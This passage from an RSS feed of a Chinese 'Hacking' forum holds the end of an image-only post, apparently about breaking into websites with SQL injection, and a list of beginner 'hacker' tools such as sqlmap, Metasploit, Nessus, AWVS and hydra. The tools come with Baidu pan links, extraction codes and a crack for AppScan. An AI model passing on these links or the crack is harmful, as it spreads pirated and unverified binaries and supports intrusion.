<div class="mbn savephotop"><img id="aimg_567" class="zoom" title="b5ff46b394133fa4d7b5322438377127.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851rbzjbnpbnzc8hkkw.jpg" alt="b5ff46b394133fa4d7b5322438377127.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid566" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY2fDczYWI0NmRkfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">ae98c9803c46517ba51421ad7900e09c.jpg</a><span> </span><em class="xg1">(38.74 KB, 下载次数: 50)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_566" class="zoom" title="ae98c9803c46517ba51421ad7900e09c.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851ib6csb6zx76edpor.jpg" alt="ae98c9803c46517ba51421ad7900e09c.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid565" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY1fDNkYTE0ODQ1fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">bea2ba4313d9a576e6dcb2cce78b7bc6.jpg</a><span> </span><em class="xg1">(39.15 KB, 下载次数: 52)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_565" class="zoom" title="bea2ba4313d9a576e6dcb2cce78b7bc6.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851haj44dejatzxaxul.jpg" alt="bea2ba4313d9a576e6dcb2cce78b7bc6.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid564" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTY0fDg4NzYyNDYwfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">3b533ec3567661ba592f722285c0d763.jpg</a><span> </span><em class="xg1">(48.1 KB, 下载次数: 50)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_564" class="zoom" title="3b533ec3567661ba592f722285c0d763.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851e3wx3qzbq033xq9i.jpg" alt="3b533ec3567661ba592f722285c0d763.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid563" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTYzfDkxYmFmYzY1fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">fbabbd6557aa15eeb601785ae7aefa36.jpg</a><span> </span><em class="xg1">(49.04 KB, 下载次数: 44)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_563" class="zoom" title="fbabbd6557aa15eeb601785ae7aefa36.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851slorg7quwqfkmwxl.jpg" alt="fbabbd6557aa15eeb601785ae7aefa36.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid562" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTYyfDRkZTBhMDgxfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">37b626b0dea506048c66c4a21a3ddfb3.jpg</a><span> </span><em class="xg1">(37.93 KB, 下载次数: 51)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_562" class="zoom" title="37b626b0dea506048c66c4a21a3ddfb3.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851xpwkmmmme3pmyvw7.jpg" alt="37b626b0dea506048c66c4a21a3ddfb3.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid561" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTYxfDllMjVhMjI5fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">d614cc244097cc47c3f56e80e1ddcf93.jpg</a><span> </span><em class="xg1">(48.85 KB, 下载次数: 48)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_561" class="zoom" title="d614cc244097cc47c3f56e80e1ddcf93.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851kkvowvpkbuu99x66.jpg" alt="d614cc244097cc47c3f56e80e1ddcf93.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid560" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTYwfDc2OGI5YjdkfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">c36332f3cb18b62e8516dc615c2b2881.jpg</a><span> </span><em class="xg1">(66.89 KB, 下载次数: 43)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_560" class="zoom" title="c36332f3cb18b62e8516dc615c2b2881.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125851rlagg4gg791w7twd.jpg" alt="c36332f3cb18b62e8516dc615c2b2881.jpg" width="600" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid559" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU5fDAzNDM1MjdlfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">0094af6e6565a6fc5934497d37586af9.jpg</a><span> </span><em class="xg1">(28.21 KB, 下载次数: 40)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_559" class="zoom" title="0094af6e6565a6fc5934497d37586af9.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125850h2imjigimqje52me.jpg" alt="0094af6e6565a6fc5934497d37586af9.jpg" width="576" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid558" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU4fDMwZGQ4ZTY4fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">53748e07feb9f9bd392317ebc03d837c.jpg</a><span> </span><em class="xg1">(22.49 KB, 下载次数: 51)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_558" class="zoom" title="53748e07feb9f9bd392317ebc03d837c.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125850c4bd856v6oivv9ke.jpg" alt="53748e07feb9f9bd392317ebc03d837c.jpg" width="576" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid557" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU3fDgwZTQzZDNjfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">3a682c6b6f4ed4f7325698d2125cca15.jpg</a><span> </span><em class="xg1">(22.77 KB, 下载次数: 43)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_557" class="zoom" title="3a682c6b6f4ed4f7325698d2125cca15.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125850s58nbzu8nosw05ee.jpg" alt="3a682c6b6f4ed4f7325698d2125cca15.jpg" width="576" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid556" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU2fDUyOWM1ODc0fDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">5089d155d594e90f82b6fe5e103f8b4c.jpg</a><span> </span><em class="xg1">(29.08 KB, 下载次数: 49)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_556" class="zoom" title="5089d155d594e90f82b6fe5e103f8b4c.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125850kbzbcbzkccknnvzh.jpg" alt="5089d155d594e90f82b6fe5e103f8b4c.jpg" width="546" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid555" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU1fDU1NzZiNDkzfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">b8f813730cf91f7e670623c87bb5d165.jpg</a><span> </span><em class="xg1">(29.03 KB, 下载次数: 50)</em></p>
<p class="mbn"> </p>
<div class="mbn savephotop"><img id="aimg_555" class="zoom" title="b8f813730cf91f7e670623c87bb5d165.jpg" src="http://www.hackerbbs.cc/data/attachment/forum/201801/11/125850poq5d2qvaeweh2ah.jpg" alt="b8f813730cf91f7e670623c87bb5d165.jpg" width="546" /></div>
</dd>
</dl>
<dl class="tattl attm">
<dt></dt>
<dd>
<p class="mbn"><a id="aid554" class="xw1" href="http://www.hackerbbs.cc/forum.php?mod=attachment&amp;aid=NTU0fGM5Yjc3OTVmfDE1ODYxMzk0NjF8MTE1NXwzNjg%3D&amp;nothumb=yes" target="_blank" rel="noopener">20bb66400f083a9a349442c8d24ca841.gif</a><span> </span><em class="xg1">(42.11 KB, 下载次数: 41)</em></p>
</dd>
</dl>
</div>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e5%a6%82%e4%bd%95%e4%bd%bf%e7%94%a8sql%e6%b3%a8%e5%85%a5%e6%94%bb%e7%a0%b4%e4%b8%80%e4%b8%aa%e7%bd%91%e7%ab%99%ef%bc%9f/</guid>
                    </item>
				                    <item>
                        <title>黑客入门常用工具（内附下载地址）</title>
                        <link>https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8%e5%b8%b8%e7%94%a8%e5%b7%a5%e5%85%b7%ef%bc%88%e5%86%85%e9%99%84%e4%b8%8b%e8%bd%bd%e5%9c%b0%e5%9d%80%ef%bc%89/</link>
                        <pubDate>Mon, 06 Apr 2020 02:09:08 +0000</pubDate>
                        <description><![CDATA[软件请在安全环境下测试1Wireshark网络抓包分析工具链接 密码：57mg【官网下载     Sqlmap下载      Nmap中文网  网盘链接  1、官方迅雷下载    提取码：pdkv7Appscan网站安全应用测试工具【注意】先安装主程序，然后点击更新产品，产品更新安装好后替换破解文件用这里面的。主程序链接 密码：t2me破解链接 密码：pbf8【官网下载   8...]]></description>
                        <content:encoded><![CDATA[<p><span>软件请在安全环境下测试</span><br /><span>1</span><br /><span>Wireshark网络抓包分析工具</span><br /><span>链接：https://pan.baidu.com/s/1zjvxA_WxRE0Os99tU7EXzA  </span><br /><span>密码：57mg</span><br /><br /><br /><span>【官网下载】</span><br /><span>https://www.wireshark.org/download.html</span><br /><br /><span>2</span><br /><span>SqlMap数据库注入工具</span><br /><span>      </span><br /><span>Sqlmap下载：http://sqlmap.org/</span><br /><span>Python下载：https://www.python.org/downloads/</span><br /><br /><span>3</span><br /><span>Nmap（Zenmap）网络映射工具</span><br /><span>       Nmap中文网：http://www.nmap.com.cn/</span><br /><br /><span>4</span><br /><span>Nessus系统漏洞扫描与分析软件</span><br /><span>   </span><br /><span>网盘链接：https://pan.baidu.com/s/1XL-fvZGtdxxTXJyoEeZHXg</span><br /><span>密码：9r72</span><br /><span>5</span><br /><span>AWVS10.5下载</span><br /><span>链接：https://pan.baidu.com/s/1CorPH59b4wZV7NpERPEpBw</span><br /><span>密码：iuxk</span><br /><br /><span>6</span><br /><span>Metasploit开源安全漏洞检测工具</span><br /><span>   </span><br /><span>1、官方迅雷下载：http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe</span><br /><br /><br /><span>2、网盘链接：https://pan.baidu.com/s/1kLi6XMuaJeYTapXeMZbeXg</span><br /><span>     提取码：pdkv</span><br /><br /><br /><span>7</span><br /><span>Appscan网站安全应用测试工具</span><br /><br /><br /><span>【注意】先安装主程序，然后点击更新产品，产品更新安装好后替换破解文件用这里面的。</span><br /><span>主程序链接：https://pan.baidu.com/s/1bAR3fcIDk358ZF_qAxm9eQ  密码：t2me</span><br /><br /><br /><span>破解链接：https://pan.baidu.com/s/1_WaQh77mCmOLu4hdb6rlOA  </span><br /><span>密码：pbf8</span><br /><br /><br /><span>【官网下载】https://dwz.cn/YYKFG2Hv</span><br /><span>  </span><br /><span>  </span><br /><br /><span>8</span><br /><span>BurpSuite网站应用程序的集成工具</span><br /><span>   </span><br /><span>【官网下载】https://portswigger.net/burp/</span><br /><span>【网站下载】http://www.pc6.com/softview/SoftView_619102.html</span><br /><span>9</span><br /><span>wwwscan、御剑、cansina网站后台扫描器</span><br /><span>   </span><br /><span>网盘链接：https://pan.baidu.com/s/1fNpTmxW2Wia8g6_-Fo6vTQ  </span><br /><span>    提取码：dyfx</span><br /><br /><span>10</span><br /><span>w3af网站应用扫描器</span><br /><span>     </span><br /><span>【Linux版本】http://w3af.org/download</span><br /><span>【Windows】https://sourceforge.net/projects/w3af/files/latest/download</span><br /><br /><br /><span>11</span><br /><span>Aircrack-ng 1.5.2无线网络分析安全软件</span><br /><span>【官网下载】</span><br /><span>    http://www.aircrack-ng.org/</span><br /><br /><br /><span>X-Scan扫描工具：</span><br /><span>https://pan.baidu.com/s/1v1XknSXrZjl7wPa3XjTCdw 提取码：q1g5</span><br /><br /><span>hydra暴力破解工具：</span><br /><span>https://pan.baidu.com/s/1mi1OmhE 密码：atgg</span></p>]]></content:encoded>
						                            <category domain="https://itprosec.com/community/hacking/">Hacking</category>                        <dc:creator>tai chi</dc:creator>
                        <guid isPermaLink="true">https://itprosec.com/community/hacking/%e9%bb%91%e5%ae%a2%e5%85%a5%e9%97%a8%e5%b8%b8%e7%94%a8%e5%b7%a5%e5%85%b7%ef%bc%88%e5%86%85%e9%99%84%e4%b8%8b%e8%bd%bd%e5%9c%b0%e5%9d%80%ef%bc%89/</guid>
                    </item>
							        </channel>
        </rss>
		